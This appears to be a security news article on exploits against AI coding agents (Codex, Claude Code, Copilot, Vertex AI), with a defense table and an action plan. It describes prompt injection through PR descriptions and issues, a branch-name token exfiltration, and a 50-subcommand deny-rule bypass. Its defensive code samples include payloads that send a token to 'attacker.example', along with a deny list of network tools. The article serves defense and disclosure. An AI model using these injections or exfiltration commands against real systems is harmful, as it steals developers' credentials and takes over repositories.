Tech and Science

Claude Code, Copilot and Codex all got hacked. Every attacker went for the credential, not the model.

Last updated: April 30, 2026 12:30 pm

Contents
  • Codex: Stealing GitHub Tokens via Branch Name
  • Claude Code: Bypassing Security with Two CVEs and a 50-Subcommand Exploit
  • Copilot: Pull Request Descriptions and GitHub Issues Trigger Root Access
  • Vertex AI: Default Scopes Access Gmail, Drive, and Google’s Supply Chain
  • VentureBeat Defense Grid
  • Every Exploit Targeted Runtime Credentials, Not Model Output
  • Security Director Action Plan
  • The Governance Gap in Three Sentences

On March 30, BeyondTrust disclosed a vulnerability in which a crafted GitHub branch name could expose Codex’s OAuth token in cleartext. OpenAI rated the issue Critical P1. Two days later, Anthropic’s Claude Code source code was inadvertently published to the public npm registry. Shortly thereafter, Adversa discovered that Claude Code stopped enforcing its own deny rules once a command exceeded 50 subcommands. These incidents capped a nine-month stretch in which six research teams identified exploits against Codex, Claude Code, Copilot, and Vertex AI. In every case the target was the same: the credentials AI coding agents use to act and authenticate to systems, without a human session anchoring the request.

The vulnerability landscape first came into view at Black Hat USA 2025, when Zenity CTO Michael Bargury hijacked ChatGPT, Microsoft Copilot Studio, Google Gemini, Salesforce Einstein, and Cursor via Jira MCP in a live demonstration requiring zero user interaction. Nine months later, attackers were going after the same class of credentials.

Merritt Baer, CSO at Enkrypt AI and previously Deputy CISO at AWS, described this issue in an exclusive VentureBeat interview: “Enterprises believe they’ve ‘approved’ AI vendors, but what they’ve actually approved is an interface, not the underlying system.” She emphasized that the underlying credentials are the true risk.

Codex: Stealing GitHub Tokens via Branch Name

BeyondTrust researchers Tyler Jespersen, Fletcher Davis, and Simon Stewart identified that Codex cloned repositories using a GitHub OAuth token embedded within the git remote URL. During the cloning process, the branch name parameter was unsanitized, allowing a semicolon and backtick subshell to transform the branch name into an exfiltration payload.

Stewart implemented additional stealth by appending 94 Ideographic Space characters (Unicode U+3000) after “main,” making the malicious branch appear identical to the standard main branch in the Codex web portal. While developers saw “main,” the shell executed a command to export their token. OpenAI rated this as Critical P1 and completed full remediation by February 5, 2026.
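The missing control here is input validation on the branch name before it is interpolated into a shell command. The sketch below is illustrative, not OpenAI’s actual fix: it flags branch names containing shell metacharacters or invisible padding such as the Ideographic Space used in this exploit.

```python
import re

# Shell metacharacters that turn an interpolated branch name into a subshell.
SHELL_META = re.compile(r"[;`$&|<>()]")
# Ideographic Space (U+3000) and other invisible characters used for spoofing.
INVISIBLE = re.compile(r"[\u3000\u00a0\u200b\u200e\u200f]")

def is_suspicious_branch(name: str) -> bool:
    """Flag branch names that could inject commands or visually spoof 'main'."""
    return bool(SHELL_META.search(name) or INVISIBLE.search(name))

# The exploit pattern: 'main' padded with Ideographic Spaces, then a subshell.
payload = "main" + "\u3000" * 94 + ";`curl attacker.example/$TOKEN`"
assert is_suspicious_branch(payload)
assert not is_suspicious_branch("feature/fix-login")
```

A stricter approach is an allowlist (for example, letters, digits, `/`, `-`, `_`, `.`), which rejects anything unexpected rather than enumerating known-bad characters.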

Claude Code: Bypassing Security with Two CVEs and a 50-Subcommand Exploit

CVE-2026-25723 affected Claude Code’s file-write restrictions, allowing piped sed and echo commands to escape the project sandbox due to unvalidated command chaining. It was patched in version 2.0.55. CVE-2026-33068 was more subtle; it involved resolving permission modes from .claude/settings.json before displaying the workspace trust dialog. A malicious repository could set permissions.defaultMode to bypassPermissions, preventing the trust prompt from appearing. This was fixed in version 2.1.53.
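The second CVE can be screened for before an agent ever opens a repository. The `.claude/settings.json` path and the `permissions.defaultMode` key come from the vulnerability description above; the pre-trust scanner itself is a hypothetical sketch, not Anthropic’s patch.

```python
import json
from pathlib import Path

def check_repo_settings(repo_root: str) -> list[str]:
    """Flag cloned repos that ship settings pre-disabling Claude Code's
    permission prompts (the CVE-2026-33068 pattern)."""
    findings = []
    settings_path = Path(repo_root) / ".claude" / "settings.json"
    if settings_path.exists():
        try:
            settings = json.loads(settings_path.read_text())
        except json.JSONDecodeError:
            return [f"{settings_path}: unparseable settings file"]
        mode = settings.get("permissions", {}).get("defaultMode")
        if mode == "bypassPermissions":
            findings.append(f"{settings_path}: defaultMode is bypassPermissions")
    return findings
```

The fix in 2.1.53 works the other way around: settings are not honored until the user has answered the trust dialog. A pre-clone scan like this is defense in depth for older versions.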


The 50-subcommand bypass was the final vulnerability identified. Adversa discovered that Claude Code stopped enforcing deny rules once a command exceeded 50 subcommands. In a trade-off for speed, Anthropic’s engineers had halted security checks after the fiftieth subcommand. This was addressed in version 2.1.90.
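The correct behavior is to check every chained segment against the deny rules with no cap. This sketch is illustrative, not Anthropic’s implementation; the deny list and the splitting logic are simplified assumptions.

```python
import re

DENY = ("curl", "wget", "nc")  # hypothetical deny list

def enforce_deny_rules(command: str) -> list[str]:
    """Check EVERY chained subcommand against the deny list, with no cap.
    The bug was stopping enforcement after the fiftieth segment."""
    violations = []
    # Split on shell chaining operators: ; && || |
    segments = re.split(r"\s*(?:;|&&|\|\||\|)\s*", command)
    for seg in segments:  # note: no [:50] truncation
        words = seg.split()
        if words and words[0] in DENY:
            violations.append(seg)
    return violations

# Bury a denied command behind 50 harmless ones, as in the bypass.
chain = "; ".join(["true"] * 50) + "; curl attacker.example"
assert enforce_deny_rules(chain) == ["curl attacker.example"]
```

The design lesson is that security checks must scale with input size or reject the input; silently truncating enforcement for performance converts a speed optimization into a bypass primitive.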

Carter Rees, VP of AI and Machine Learning at Reputation and a Utah AI Commission member, pointed to the underlying failure in enterprise AI: broken access control, in which an LLM’s flat authorization plane does not respect per-user permissions. In Claude Code’s case, the repository dictated the agent’s permissions, and the token budget determined which deny rules were enforced.

Copilot: Pull Request Descriptions and GitHub Issues Trigger Root Access

Johann Rehberger demonstrated CVE-2025-53773 against GitHub Copilot with Markus Vervier of Persistent Security as a co-discoverer. Hidden instructions in pull request (PR) descriptions caused Copilot to enable auto-approve mode in .vscode/settings.json. This disabled all confirmations, allowing unrestricted shell execution on Windows, macOS, and Linux. Microsoft patched this in the August 2025 Patch Tuesday release.

Orca Security later exploited Copilot within GitHub Codespaces. Hidden instructions in a GitHub issue led Copilot to check out a malicious PR with a symbolic link to /workspaces/.codespaces/shared/user-secrets-envs.json. A crafted JSON $schema URL then exfiltrated the privileged GITHUB_TOKEN, allowing a complete repository takeover with no user interaction beyond opening the issue.
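Both Copilot exploits left file-system evidence a workspace audit can catch: a confirmation-disabling key written to `.vscode/settings.json`, and a symlink pointing into Codespaces internals. The sketch below is hypothetical; the `chat.tools.autoApprove` key name is an assumption based on public write-ups of the CVE, so verify the exact identifier against your editor’s documentation.

```python
import json
from pathlib import Path

# Settings that disable confirmation prompts; key names are illustrative.
RISKY_KEYS = ("chat.tools.autoApprove",)

def audit_workspace(repo_root: str) -> list[str]:
    """Flag workspace state matching the CVE-2025-53773 and RoguePilot chains."""
    findings = []
    root = Path(repo_root)
    settings = root / ".vscode" / "settings.json"
    if settings.exists():
        data = json.loads(settings.read_text())
        for key in RISKY_KEYS:
            if data.get(key):
                findings.append(f"{settings}: {key} enabled")
    # The RoguePilot chain used a symlink escaping the workspace into
    # Codespaces internals (e.g. user-secrets-envs.json).
    for path in root.rglob("*"):
        if path.is_symlink() and ".codespaces" in str(path.resolve()):
            findings.append(f"{path}: symlink into Codespaces internals")
    return findings
```

Running a check like this on agent-modified branches, before review, turns the exploit’s own artifacts into detection signals.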

Mike Riemer, CTO at Ivanti, explained the speed factor in a VentureBeat interview: “Threat actors are reverse engineering patches within 72 hours. If a customer doesn’t patch within that window, they’re vulnerable to exploitation.” Agents reduce this time frame to mere seconds.

Vertex AI: Default Scopes Access Gmail, Drive, and Google’s Supply Chain

Unit 42 researcher Ofir Shaty discovered that the default Google service identity for every Vertex AI agent had excessive permissions. Stolen P4SA credentials allowed unrestricted read access to all Cloud Storage buckets in the project and access to restricted, Google-owned Artifact Registry repositories crucial to the Vertex AI Reasoning Engine. Shaty described the compromised P4SA as acting like a “double agent,” accessing both user data and Google’s infrastructure.
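A least-privilege audit reduces to comparing the scopes a service identity actually holds against an approved allowlist. This is a minimal sketch under assumed scope values; the scope URLs are real Google OAuth scope identifiers, but the allowlist and inventory are placeholders for your own policy.

```python
# Approved scopes for a coding agent's service identity (hypothetical policy).
ALLOWED_SCOPES = {
    "https://www.googleapis.com/auth/cloud-platform.read-only",
}

def audit_scopes(granted: set[str]) -> set[str]:
    """Return granted scopes that exceed the allowlist and need review."""
    return granted - ALLOWED_SCOPES

# Over-broad defaults of the kind Unit 42 found: full platform plus Drive.
granted = {
    "https://www.googleapis.com/auth/cloud-platform",
    "https://www.googleapis.com/auth/drive",
}
assert audit_scopes(granted) == granted  # both exceed the allowlist
```

The harder problem Shaty surfaced is that some default scopes were not editable at all, which is why the action plan below recommends moving to a bring-your-own-service-account model where you control the grant.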

VentureBeat Defense Grid

| Security requirement | Defense shipped | Exploit path | The gap |
|---|---|---|---|
| Sandbox AI agent execution | Codex runs tasks in cloud containers; token scrubbed during agent runtime. | Token present during cloning. Branch-name command injection executed before cleanup. | No input sanitization on container setup parameters. |
| Restrict file system access | Claude Code sandboxes writes via accept-edits mode. | Piped sed/echo escaped sandbox (CVE-2026-25723). Settings.json bypassed trust dialog (CVE-2026-33068). 50-subcommand chain dropped deny-rule enforcement. | Command chaining not validated. Settings loaded before trust. Deny rules truncated for performance. |
| Block prompt injection in code context | Copilot filters PR descriptions for known injection patterns. | Hidden injections in PRs, README files, and GitHub issues triggered RCE (CVE-2025-53773 + Orca RoguePilot). | Static pattern matching loses to embedded prompts in legitimate review and Codespaces flows. |
| Scope agent credentials to least privilege | Vertex AI Agent Engine uses P4SA service agent with OAuth scopes. | Default scopes reached Gmail, Calendar, Drive. P4SA credentials read every Cloud Storage bucket and Google’s Artifact Registry. | OAuth scopes non-editable by default. Least privilege violated by design. |
| Inventory and govern agent identities | No major AI coding agent vendor ships agent identity discovery or lifecycle management. | Not attempted. Enterprises do not inventory AI coding agents, their credentials, or their permission scopes. | AI coding agents are invisible to IAM, CMDB, and asset inventory. Zero governance exists. |
| Detect credential exfiltration from agent runtime | Codex obscures tokens in web portal view. Claude Code logs subcommands. | Tokens visible in cleartext inside containers. Unicode obfuscation hid exfil payloads. Subcommand chaining hid intent. | No runtime monitoring of agent network calls. Log truncation hid the bypass. |
| Audit AI-generated code for security flaws | Anthropic launched Claude Code Security (Feb 2026). OpenAI launched Codex Security (March 2026). | Both scan generated code. Neither scans the agent’s own execution environment or credential handling. | Code-output security is not agent-runtime security. The agent itself is the attack surface. |


Every Exploit Targeted Runtime Credentials, Not Model Output

Despite each vendor deploying defenses, every defense was ultimately bypassed.

The Sonar 2026 State of Code Developer Survey found that 25% of developers use AI agents regularly and 64% have adopted them at some point. Veracode evaluated more than 100 LLMs and found that 45% of generated code samples contained OWASP Top 10 flaws, compounding the problem: insecure generated code running under over-scoped runtime credentials.

CrowdStrike CTO Elia Zaitsev stressed in a VentureBeat interview at RSAC 2026 the importance of aligning agent identities with human identities: an agent acting on behalf of a user should not have more privileges than the user. Codex possessed a GitHub OAuth token scoped to every repository authorized by the developer. Vertex AI’s P4SA had access to every Cloud Storage bucket within the project. Claude Code prioritized token budget over deny-rule enforcement.

Kayne McGladrey, an IEEE Senior Member advising on identity risk, echoed a similar sentiment in a VentureBeat interview: “It uses far more permissions than it should have, more than a human would, due to the speed of scale and intent.”

Riemer, in another VentureBeat interview, emphasized the importance of validation: “It becomes, I don’t know you until I validate you.” Here, the branch name communicated with the shell prior to validation, just as the GitHub issue communicated with Copilot before being reviewed.

Security Director Action Plan

  1. Inventory every AI coding agent (CIEM). Codex, Claude Code, Copilot, Cursor, Gemini Code Assist, Windsurf. Catalog the credentials and OAuth scopes each received during setup. If absent, create a CMDB category for AI agent identities.

  2. Audit OAuth scopes and patch levels. Upgrade Claude Code to version 2.1.90 or later. Confirm Copilot’s August 2025 patch. Transition Vertex AI to a bring-your-own-service-account model.

  3. Treat branch names, pull request descriptions, GitHub issues, and repository configuration as untrusted input. Monitor for Unicode obfuscation (U+3000), command chaining over 50 subcommands, and alterations to .vscode/settings.json or .claude/settings.json that change permission modes.

  4. Govern agent identities as you would human privileged identities (PAM/IGA). Implement credential rotation, least-privilege scoping, and separation of duties between coding and deployment agents. CyberArk, Delinea, and any PAM platform accepting non-human identities can onboard agent OAuth credentials today; Gravitee’s 2026 survey indicated only 21.9% of teams have done this.

  5. Validate before you communicate. “As long as we trust and we check and we validate, I’m fine with letting AI maintain it,” Riemer stated. Before any AI coding agent authenticates to GitHub, Gmail, or an internal repository, verify the agent’s identity, scope, and the human session it is linked to.

  6. Ask each vendor in writing before your next renewal. “Show me the identity lifecycle management controls for the AI agent running in my environment, including credential scope, rotation policy, and permission audit trail.” If the vendor cannot provide an answer, that constitutes an audit finding.


The Governance Gap in Three Sentences

Most CISOs track every human identity but lack inventory of AI agents operating with equivalent credentials. IAM frameworks do not govern human and agent privilege escalation with consistent rigor. Most scanners detect every CVE but fail to alert when a branch name exfiltrates a GitHub token through a trusted container.

Zaitsev advised RSAC 2026 attendees with clarity: the necessary actions are known. Agents have only increased the cost of inaction to a catastrophic level.

